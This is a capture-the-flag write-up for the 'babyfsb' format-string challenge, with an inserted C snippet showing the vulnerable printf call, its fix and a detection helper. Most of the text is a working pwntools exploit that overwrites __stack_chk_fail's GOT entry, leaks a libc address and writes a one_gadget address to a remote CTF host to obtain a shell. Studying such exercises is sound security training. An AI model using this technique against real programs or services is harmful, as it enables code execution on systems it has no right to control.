babyfsb
The stack canary is enabled.
The program first takes input with read and then prints it with printf, so the input is used as the format string.
Since only one input is possible, overwrite the GOT entry of __stack_chk_fail with the address of main, so that the canary check failing re-enters main and gives further inputs.
Then leak the return address (into __libc_start_main) and compute the libc base from it.
Finally overwrite the GOT entry of __stack_chk_fail with the one_gadget address.
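The defect the writeup relies on is the classic one: user input passed to printf as the format string. The C below is an added illustration, not code from the challenge binary or its author; the function names echo_vulnerable, echo_fixed and contains_conversion are my own. It shows the vulnerable call beside the fixed form, and a small helper a reviewer or a test can use to spot input that would be interpreted as format directives.

```c
#include <stdio.h>
#include <string.h>

/* Vulnerable pattern, as in the challenge: the user's buffer *is* the format
 * string, so %p leaks stack contents and %n/%hn write to memory. */
int echo_vulnerable(const char *buf)
{
    return printf(buf);
}

/* Fixed pattern: the format string is a constant and the input is only data.
 * printf returns the number of characters written. */
int echo_fixed(const char *buf)
{
    return printf("%s", buf);
}

/* Review/test helper: returns 1 if buf contains a conversion directive,
 * i.e. a '%' not immediately followed by another '%'. */
int contains_conversion(const char *buf)
{
    const char *p = strchr(buf, '%');
    while (p) {
        if (p[1] != '%')
            return 1;          /* lone '%' starts a directive such as %p or %hn */
        p = strchr(p + 2, '%'); /* skip the escaped "%%" pair */
    }
    return 0;
}

int main(void)
{
    const char *input = "%25$p";   /* constructed sample: the leak string from the writeup */
    printf("directive present: %d\n", contains_conversion(input));
    echo_fixed(input);             /* prints the literal text "%25$p" */
    putchar('\n');
    return 0;
}
```

Compiling with -Wformat-security (or -Werror=format-security) flags the echo_vulnerable call at build time; the constant-format version is the actual fix, while contains_conversion is only a check for tests and log review.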
from pwn import *

# p = process('./babyfsb')
p = remote('ctf.j0n9hyun.xyz', 3032)
e = ELF('./babyfsb')
libc = ELF('./libc.so.6')

canary_got = e.got['__stack_chk_fail']  # GOT slot called when the canary check fails
main = e.symbols['main']
magic_offset = 0x45216                  # one_gadget offset in the provided libc

# Stage 1: write main into the low 4 bytes of __stack_chk_fail@got with two %hn writes,
# so that the failing canary check jumps back to main.
main_low = main & 0xffff
main_high = (main >> 16) & 0xffff
fmt = '%{}c'.format(main_low)
fmt += '%10$hn'  # arg 10 = 6 + 32/8: the first p64 after the 32-byte format string
fmt += '%{}c'.format(0x10000 + main_high - main_low)
fmt += '%11$hn'
payload = fmt.encode()
payload += b'A' * (8 - len(payload) % 8)  # align so the addresses land on 8-byte args
payload += p64(canary_got)
payload += p64(canary_got + 2)
payload += b'B' * (0x40 - len(payload))
p.send(payload)

# Stage 2: leak main's return address (inside __libc_start_main) and derive the libc base.
payload = b'%25$p'
payload += b'A' * (0x40 - len(payload))
p.send(payload)
p.recvuntil(b'0x')
leak_data = p.recvuntil(b'830')  # __libc_start_main+240 ends in ...830 in this libc
leak_data = int(leak_data, 16)
libc_base = leak_data - libc.sym['__libc_start_main'] - 240
magic = libc_base + magic_offset

# Stage 3: write the 6-byte one_gadget address into the GOT slot with three %hn writes.
# Each width is the delta from the running character count, wrapped to 16 bits;
# a zero delta is written as a full 0x10000 so the count still lands on the same low 16 bits.
low = magic & 0xffff
middle = (magic >> 16) & 0xffff
high = (magic >> 32) & 0xffff
l = low
m = (middle - low) & 0xffff or 0x10000
h = (high - middle) & 0xffff or 0x10000
fmt = '%{}d'.format(l)
fmt += '%11$hn'  # format string is 40 bytes here, so the first address is arg 6 + 40/8
fmt += '%{}d'.format(m)
fmt += '%12$hn'
fmt += '%{}d'.format(h)
fmt += '%13$hn'
payload = fmt.encode()
payload += b'A' * (8 - len(payload) % 8)
print(len(payload))
payload += p64(canary_got)
payload += p64(canary_got + 2)
payload += p64(canary_got + 4)
payload += b'A' * (0x40 - len(payload))
p.send(payload)
p.interactive()